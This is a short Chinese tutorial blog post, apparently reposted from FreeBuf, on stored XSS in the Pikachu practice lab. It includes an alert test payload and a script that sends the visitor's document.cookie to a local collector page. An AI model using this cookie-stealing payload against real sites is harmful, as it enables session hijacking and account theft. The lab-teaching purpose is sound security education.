管他呢?!!!先用BURP抓个包再说!!!
HTTP方法是POST,传递信息在DATA!!!
这块,我去看大佬写的东西,看到了一个这样的典型案例!!
TIPS:有人的qq号被盗号之后在好友的空间里进行恶意留言,点进去就容易丢失某些信息。(存储型XSS)
小知识:存储型xss,一般出现在留言板或评论区等位置,提交的信息会保存到被攻击系统上,所以存储型xss又被称为持久性XSS,他所造成的威胁将更大!!!
经查看,源代码:
如果这里我在留言栏中增加:一条JS代码:实现上是会执行的!!!
<script>alert(1)</script>
而且,由于该代码是保存在系统内部的,所以没次刷新界面时,都会弹出此代码。
这里,我们引申,如果该代码是盗取用户COOKIE的代码呢?
每次用户查看此界面,用户的COOKIE信息都会被盗取,并发送到指定攻击者的IP地址上。
经查看源代码:留言提交的JS代码,已经嵌入代码执行
那个,如果我们用这个PAYLOAD提交,会发生什么呢?
<script>location.href=”http://localhost/pikachu/pkxss/xcookie/cookie.php?cookie=”+document.cookie</script>
查看源代码:
来源:freebuf.com 2021-07-14 14:10:00 by: 知非知非知非
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666